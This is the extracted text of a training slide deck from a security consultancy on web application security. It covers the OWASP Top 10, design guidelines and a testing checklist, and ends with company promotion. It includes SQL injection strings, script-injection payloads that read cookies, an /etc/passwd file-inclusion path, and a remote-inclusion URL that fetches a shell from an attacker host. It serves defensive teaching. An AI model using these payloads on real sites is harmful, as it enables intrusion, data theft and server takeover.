Download - Web Application Security
Session Flow
• What is Web Application Security?• Security Misconceptions• Reasons for Attacking Web Applications• OWASP Top 10 Vulnerabilities• Security guidelines• Web Application Security checklist
Need for Cyber Security
• Use of Complex computer infrastructure is increasing .• Use of Web Applications increasing. • Decreasing Level of Skill Set of Hackers.
Problem Illustration
Dat
abas
es
Leg
acy
Sys
tem
s
Web
Ser
vice
s
Dir
ecto
ries
Hu
man
Res
rcs
Bill
ing
Custom Code
APPLICATIONATTACK
Ap
plic
atio
n L
ayer
Acc
ou
nts
Fin
ance
Ad
min
istr
atio
nT
ran
sact
ion
s
Co
mm
un
icat
ion
Kn
ow
led
ge
Mg
mt
E-C
om
mer
ce
Bu
s. F
un
ctio
ns
Application LayerApplication Layer• Attacker sends attacks
inside valid HTTP requests
• Your custom code is tricked into doing something it should not
• Security requires software development
Fir
ewal
l
Hardened OS
Web Server
App Server
Fir
ewal
l
Net
wo
rk L
ayer
Insider
software development expertise, not signatures
•Network Layer• Firewall, hardening,
patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests.
• Security relies on signature databases
Security Misconceptions
“The Firewall protects my web server and database”
• Access to the server through ports 80 and 443 makes the webserver part of your external perimeter defense
• Vulnerabilities in the web server software or web applications mayallow access to internal network resourcesallow access to internal network resources
Security Misconceptions
“The IDS protects my web server and database”
• The IDS is configured to detect signatures of various well-knownattacks
• Attack signatures do not include those for attacks against customapplicationsapplications
Security Misconceptions
“SSL secures my site”
• SSL secures the transport of data between the web server and theuser’s browser.
• SSL does not protect against attacks against the server andapplications.applications.
• SSL is the hackers best friend due to the false sense of security
The Source of Problem
“Malicious hackers don’t create security holes; they simply exploitthem. Security holes and vulnerabilities – the real root cause of theproblem – are the result of bad software design andimplementation.”
-John Viega & Gary McGraw
OWASP Top 10 Vulnerabilities
1. Injection Flaws2. Cross Site Scripting (XSS)3. Malicious File Execution4. Insecure Direct Object Reference 5. Cross Site Request Forgery (CSRF)6. Information Leakage and Improper Error Handling6. Information Leakage and Improper Error Handling7. Broken Authentication and Session Management 8. Insecure Cryptographic Storage9. Insecure Communications10. Failure to Restrict URL Access
Injection Flaws
• Injection means…•Tricking an application into including unintended commands inthe data sent to an interpreter
• Interpreters…•Take strings and interpret them as commands•SQL, OS Shell, LDAP, XPath, etc…•SQL, OS Shell, LDAP, XPath, etc…
• SQL injection is still quite common•Many applications still susceptible
SQL Injection Example
Attacker sends data containing SQL fragments
Attacker enters SQL fragments into a web page that uses input in a query
1
Custom Code
Acc
ou
nts
Fin
ance
Ad
min
istr
atio
nT
ran
sact
ion
s
Co
mm
un
icat
ion
Kn
ow
led
ge
Mg
mt
E-C
om
mer
ce
Bu
s. F
un
ctio
ns
Database
3
that uses input in a query
Attacker views unauthorized data
Database
2 Application sends modified query to database, which executes it
EXAMPLE: $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id’] . "’";
Injection Flaws
Dat
abas
es
Lega
cy S
yste
ms
Web
Ser
vice
s
Dire
ctor
ies
Hum
an R
esrc
s
Bill
ing
Custom Code
APPLICATIONATTACKA
pplic
atio
n La
yer
Acc
ount
s
Fin
ance
Adm
inis
trat
ion
Tra
nsac
tions
Com
mun
icat
ion
Kno
wle
dge
Mgm
t
E-C
omm
erce
Bus
. Fun
ctio
ns
HTTP request
M
SQL query
M
DB Table Ï
>
HTTP response Ð
>
“SELECT * FROM accounts WHERE acct=‘’ OR 1=1--
’”
Account Summary
Acct:5424-6066-2134-4334
Account:
SKU:
Account:
SKU:
1. Application presents a form to the attacker all via SSL2. Attacker sends an attack in
Fire
wal
l
Hardened OS
Web Server
App Server
Fire
wal
l
Net
wor
k La
yer
2. Attacker sends an attack in the form data
3. Application forwards attackto the database in a SQL query
4.Database runs querycontaining attack and sendsencrypted results back toapplication5. Application decrypts data as normal and sends results to the user
SQL Injection
• It is a flaw in "web application" development, it is not a DB or webserver problem.
• Most programmers are still not aware of this problem
•A lot of the tutorials & demo “templates” are vulnerable
• Even worse, a lot of solutions posted on the Internet are not goodenough.
• In our pen tests over 60% of our clients turn out to be vulnerable toSQL Injection
Business Impacts of SQL Injection
Attackers can…
• Access the entire database schema• Steal, modify, and delete database contents• Prevent legitimate access to the database• Run operating system commands on database server• Disclose company proprietary data• Disclose company proprietary data
SQL Injection
Common vulnerable login query SELECT * FROM users WHERE login = 'victor'AND password = '123‘
(If it returns something then login!)
ASP/MS SQL Server login syntaxASP/MS SQL Server login syntax
var sql = "SELECT * FROM usersWHERE login = '" + formusr + "' AND password = '" + formpwd + "'";
SQL Injection
Injecting Through Strings
formusr = ' or 1=1 – –formpwd = anything
Final query would look like this:
SELECT * FROM usersWHERE username = ' ' or 1=1– – AND password = 'anything'
SQL Injection
The Power of ‘
• It closes the string parameter.• Everything after is considered part of the SQL command.
SELECT * FROM clients WHERE account = 12345678WHERE account = 12345678AND pin = 1111
PHP/MySQL login syntax$sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
SQL Injection
Injecting Numeric Fields
$formacct = 1 or 1=1 # $formpin = 1111
Final query would look like this:
SELECT * FROM clientsWHERE account = 1 or 1=1# AND pin = 1111
SQL Injection
• Standard SQL commands such as"Select“ , "Insert“, "Update“, "Delete“, "Create", and "Drop" can beused to accomplish almost everything that one needs to do with adatabase.
• When you click a link like this,
• www.site.com/news.asp?ArticleID=10,
• The link tells the site to look in the table that stores the article names for an article who’s "ArticleID" is 10.
SQL Injection
• The "INFORMATION_SCHEMA" holds the names of every table andcolumn on a site.
• On every SQL server there will be an "INFORMATION_SCHEMA" andits name will never change.
Understanding Error Messages
• Example : www.site.com/index.php?id=1
• Add ‘ or /* after id= 1 to check whether site is vulnerable or not.
• if site is giving some error/blank page then site is vulnerable to SQLinjection.
Finding out Vulnerable Columns
• Example : www.site.com/index.php?id=1+order+by+1 --
• Increase order till you get an error message something like
“Unknown Column in ‘Order’ Clause
Extracting Information from database
www.site.com/index.php?id=1+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables
• The above mentioned query gives names of tables stored indatabase.
www.site.com/index.php?id=1+union+all+select+1,column_name+3,www.site.com/index.php?id=1+union+all+select+1,column_name+3,4,5,6,7+from+information_schema.columns+where+table_schema=char()
• The above mentioned query gives names of tables stored indatabase.
XSS ( Cross Site Scripting)
• Occurs any time…• Raw data from attacker is sent to an innocent user
• Raw data…• Stored in database• Reflected from web input (form field, hidden field, url, etc…)• Sent directly into rich JavaScript client• Sent directly into rich JavaScript client
• Virtually every web application has this problem• Try this in your browser – javascript:alert(document.cookie)
Reflected XSS
http://www.boi.com Search-field input is often reflected back to user.
<script>alert(document.cookie)</script>
Site reflects the script back to user where it executes and displays the session cookie in a pop-up.
Business Impact of XSS
Attackers can…
• Steal user sessions for complete account takeover• Steal data on web pages viewed by victim• Deface pages viewed by victim• Use web pages for phishing
Business Impact of XSS
Occurs any time…
• Raw data from attacker is sent to an innocent user
Raw data…
• Stored in database• Stored in database• Reflected from web input (form field, hidden field, url, etc…)• Sent directly into rich JavaScript client• Virtually every web application has this problem
Finding XSS
• Most Common Blogs, Forums, Shout boxes, Comment Boxes, Search Box's, there are too many to mention.
• Using 'Google Dorks‘ search inurl: "search.php?q="
•XSS Examples
http://site.com/search.php?q=<script>alert("XSS")</script>
http://site.com/search.php?q=<script>window.open( "http://www.google.com/" )</script>
Case Study: XSS
A British researcher, Jim Ley,discovered (2004) a XSS flawin Google and provided thisproof of concept Phishingpage where Googlebecomes a ‘paying service’.becomes a ‘paying service’.If you would be so kind as toprovide your credit carddetails . Now fixed.
Stored XSS
Application with stored XSS vulnerability
Attacker sets the trap – update my profile
Attacker enters a malicious script into a web page that stores the data on the server
1
Acc
ount
s
Fin
ance
Adm
inis
trat
ion
Tra
nsac
tions
Com
mun
icat
ion
Kno
wle
dge
Mgm
tC
omm
erce
Bus
. Fun
ctio
ns
3
2 Victim views page – sees attacker profile
Script silently sends attacker Victim’s session cookie
Script runs inside victim’s browser with full access to the DOM and cookies
Custom Code
Acc
ount
s
Fin
ance
Adm
inis
trat
ion
Tra
nsac
tions
Com
mun
icat
ion
Kno
wle
dge
Mgm
tE
-Com
mer
ce
Bus
. Fun
ctio
ns
Insecure Direct Object Reference - LFI
•The simplest way to see if a script is vulnerable to local file inclusion, is this:
•index.php?page=../../../../../../../../../etc/passwd
•That Shows the complete User information in that server with paths..paths..
•Where ../ causes the script to move up one directory,
•Multiple ../ cause the script to move to the top level directory (/, the root of the filesystem) and /etc/passwd is the Unix passwd file.
Malicious File Inclusion - RFI
• Malicious file execution vulnerabilities are found in manyapplications.
• Developers will often directly use or concatenate potentially hostileinput with file or stream functions, or improperly trust input files.
• On many platforms, frameworks allow the use of external object• On many platforms, frameworks allow the use of external objectreferences, such as URLs or file system references.
• When the data is insufficiently checked, this can lead to arbitraryremote and hostile content being included, processed or invoked bythe web server.
Malicious File Inclusion Illustration
Attacker sends request that specifies the path to a malicious file in a parameter
Attacker changes a parameter which is supplied
1
Custom Code
Acc
ou
nts
Fin
ance
Ad
min
istr
atio
nT
ran
sact
ion
s
Co
mm
un
icat
ion
Kn
ow
led
ge
Mg
mt
E-C
om
mer
ce
Bu
s. F
un
ctio
ns
3
parameter which is supplied to a file inclusion function
Attacker views results of executing the attack, or takes control of the affected server
File System
2 PHP application includes the specified file and executes the contents
Business Impact of RFI
This allows attackers to perform:
• Remote code execution • Remote root kit installation and complete system compromise.• Remote shell installation• Remote modification & deletion of files on server.
RFI
If allow_url_include is on in php.ini, we can inject a shell directly.
You only need to load by GET or POST directly to an URI with the shell (using a non PHP extension):
Like http://www.techdefence.com/index.php?page=news.php
Now if the Index.php has Remote File Inclusion like
<?phpinclude($_GET[‘page’]);?>
So the above URL is written like http://www.techdefence.com/index.php?page=http://www.evilscript.com/shell.txt
Fixing RFI
• Practice Secure Coding Techniques
• Instead of using $_GET use $_POST
• Filter all the pages and Give file permissions perfectly so that no one can access.
• Keep Safe Mode On in PHP.
• Disallow unused commands in linux environment
Information Leakage and Improper Error Handling
• Applications can unintentionally leak information about theirconfiguration, internal workings, or violate privacy through a varietyof application problems.
• Applications can also leak internal state via how long they take toprocess certain operations or via different responses to differinginputs, such as displaying the same error text with different errorinputs, such as displaying the same error text with different errornumbers.
• Web applications will often leak information about their internalstate through detailed or debug error messages.
Information Leakage and Improper Error Handling
• Fixing Information Leakage & improper Error Handling
• Ensure that the entire software development team shares acommon approach to exception handling.
• Disable or limit detailed error handling. In particular, do notdisplay debug information to end users, stack traces, or pathdisplay debug information to end users, stack traces, or pathinformation.
• Ensure that secure paths that have multiple outcomes returnsimilar or identical error messages in roughly the same time.
Failure to restrict URL Access
• Frequently, the only protection for a URL is that links to that pageare not presented to unauthorized users.
• However, a motivated, skilled, or just plain lucky attacker may beable to find and access these pages, invoke functions, and viewdata.
Fixing Failure to restrict URL Access
• Ensure the access control matrix is part of the business,architecture, and design of the application
• Ensure that all URLs and business functions are protected by aneffective access control mechanism.
• Pay close attention to include/library files.• Pay close attention to include/library files.
• Do not assume that users will be unaware of special or hiddenURLs or APIs
• Keep up to date with virus protection and patches
Vulnerability Scnners
• Acunetix Vulnerability Scanner
• W3af Vulnerability Scanner
• AppScan Vulnerability Scanner
Security Guidelines
1. Validate Input and Output2. Fail Securely (Closed)3. Keep it Simple4. Use and Reuse Trusted Components5. Defense in Depth6. Only as Secure as the Weakest Link7. Security By Obscurity Won't Work8. Least Privilege8. Least Privilege9. Compartmentalization (Separation of Privileges)
Validate Input & Output
• All user input and user output should be checked to ensure it is both appropriate and expected.
• Allow only explicitly defined characteristics and drop all other data.
Fail Securely
• When it fails, it fails closed.
•It should fail to a state that rejects all subsequent security requests.
•A good analogy is a firewall. If a firewall fails it should drop all subsequent packets
Keep It Simple
• If a security system is too complex for its user base, it will eithernot be used or users will try to find measures to bypass it.
• This message applies equally to tasks that an administrator mustperform in order to secure an application.
• This message is also intended for security layer API's that• This message is also intended for security layer API's thatapplication developers must use to build the system.
Use & Reuse Components
• Using and reusing trusted components makes sense both from aresource stance and from a security stance.
• When someone else has proven they got it right, take advantageof it.
Defence In Depth
• Relying on one component to perform its function 100% of thetime is unrealistic.
• While we hope to build software and hardware that works asplanned, predicting the unexpected is difficult. Good systems don'tpredict the unexpected, but plan for it.
Only as Secure as the Weakest Link
•Careful thought must be given to what one is securing.
•Attackers are lazy and will find the weakest point and attempt to exploit it.
Security By Obscurity Won't Work
• It's naive to think that hiding things from prying eyes doesn't buysome amount of time.
• This strategy doesn't work in the long term and has no guaranteeof working in the short term.
Least Privilege
• Systems should be designed in such a way that they run with theleast amount of system privilege they need to do their job.
Compartmentalization (Separation of Privileges)
• Compartmentalizing users, processes and data helps containproblems if they do occur.
• Compartmentalization is an important concept widely adopted inthe information security realm.
Web Application Vulnerability Checklists
• Parameter CheckList
• URL request• URL encoding• Query string• Header• Cookie• Form field• Form field• Hidden field• Client side validation• ‘Tainted’ parameters• Min/Max lengths• Concatenate commands• Determine policies for access to content and functions.
Session Management
• Token protection• Session Duration• Idle time Duration• Guess Session ID format• Transfer in URL or BODY?• Is Session Id linked to the IP address?• Change Referrer tag• Change Referrer tag
Backend Authentication
• Trust relationships• Encryption• Plaintext password in HTML• Password in configuration file.
XSS
• Which type – stored or reflected?• Check for 404/500 error pages for return information.• Input validation.
Misconfiguration
• Nikto results• Nessus results• Patch level• Directory listing• Directory permission• Error messages• Default username/pass• SSL cert. Configuration• Debug or configuration Files• SSL cert. Configuration• Debug or configuration Files• Check for latest vulnerabilities
SQL Injection
• Mirror website and search for all input parameters• Gain database related information• Error Messages• Privileges given to the webserver or database
Access Points
• Ability to brute force at the discovered access points.• Ability to bypass auth. with spoofed tokens• Ability to conduct replay attack.• Forced browsing, does application keep a check by trackingrequest from each user.
Need For Cyber Security
• Information is asset of any organization. Any breach in information security can affect image/reputation of organization.
• Lack of Cyber Security Awareness among netizens.
• 10% of total Netizens aware about Hacking & Hackers.
• 5% of total Law Enforcement Agencies people are well trained to tackle cyber crime.
• Recent Surveys shows 200% increase in Cyber Crime.
TechDefence Consulting Pvt Ltd
• Vision :
To make a lasting impression and carve a special space for ourselvesas a trusted and globally accepted security service provider.
• Mission:
To affirm our vision of being a global security service provider,TechDefence Consulting aims to deliver timely, efficient , qualityconscious and cost effective security solutions through our team ofcertified security professionals to organizations across the globeand assist as well as ensure that their systems and processes aretotally secure and stable from any threat whatsoever.
Our Global Presence
• India Offices:
Ahmedabad, V.V.Nagar, Nasik, Pune,Hyderabad
• International Offices:
Mauritius, AustraliaMauritius, Australia
Our Services
TechInvestigations – A Cyber Crime Investigation unit
“ If you want to catch Criminal then Think like “one”
•Analysing, investigating and accumulating the digital evidence and cyber trails is betterknown as Cyber Crime Investigation. It can be found in computer hard disks, cell phones,CDs, DVDs, floppies, computer networks, the Internet etc.
• Make Law Enforcement or Government Agencies - Aware of the various Cyber Crimes!.• Make Law Enforcement or Government Agencies - Aware of the various Cyber Crimes!.
• Guide them - How to Prevent Cyber Crimes?
• Solve Cyber Crime Cases using our technical expertise for Law Enforcement Agencies.
• Aide them to – Legally resolve and bring the Cyber Criminals (People who commit Cyber Crimes) to justice.
Our Services
TechInvestigation – A Cyber Crime Investigation unit
Our Recent Cases:
• Ahmedabad Serial Bomb Blast Terror Mail case – Traced out Terror Mail trail of Ahmedabad Serial Bomb Blast case.
• Cyber Investigation of Mumbai Blasts – We have successfully accomplished task of getting confidential information from JAMAT UD DAWAH.
Our Services
TechHackscan – A Vulnerability Assessment & Penetration Testing unit
“Where you will see the facilities, we see the flaws”
• As Penetration tester & Website Security Auditor, we evaluate security ofclient’s websites through simulation of a controlled and managed intrusion intoyour system by a malicious user, known as a cracker.
• We will assure that our active analysis of the websites for any potentialvulnerability that may result from poor or improper system configuration,development is going to be carried out.
• We submit Developer as well as remediation report.
Our Services
TechForensics – A Cyber Forensics Unit
• With the right application of science and technology for acquisition,preservation, identification, analysis, and presentation of digital evidence or datain a way, we preserve the integrity of the digital information blending it with thelegal acceptability.
• We provide the highest quality instructor interactive training to help legal firms,• We provide the highest quality instructor interactive training to help legal firms,accounting firms, government and law enforcement agencies for betterperformance in the cyber forensic matters.
• We can also work on Framework Development for Cyber Forensics Labs (CFL)
Our Services
Training & Workshops
• TechDefence Certified Cyber Security Expert.
• NASSCOM Predicts requirement of 1,88,000 security professionals by2010,currently the number of security professionals in india is arount 22,000.
• CCSE is Career oriented hands on training program on Advanced Ethical• CCSE is Career oriented hands on training program on Advanced EthicalHacking, Cyber Crime Investigation, Cyber Forensics & Penetration Testing.
Our Clients
Private Sector – VAPT
• Computer Clinic - Mauritius• Multievents Ltd - Mauritius• Noble Ventures – USA• Future Group• Mid Day, Delhi• Mid Day, Delhi
Govt Sector
• Crime Branch, Ahmedabad• ATS, Mumbai• URICM, Gandhi Nagar• Chief Minister’s Office, Government of Gujarat
Our Clients
Corporate Workshops – Hackintosh 2009
• YAHOO!,• Google,• K7 Antivirus,• ZOHO,• KPMG,• KPMG,• HCL,• TCS• Delloitte ,• ISACA,T• Temenos.
TechDefence Labs
• A Research & Development Unit focusing on Secure Software Development,Client Security Product, Security Product Development.
• TechDefence Projects to offer
• HIDS (Host based Intrusion Detection System).• Centralized Cyber Café Monitoring & Reporting System.• File Encrypter.• File Encrypter.• Online VAPT Scanner.• Online Multi Antivirus Scanner.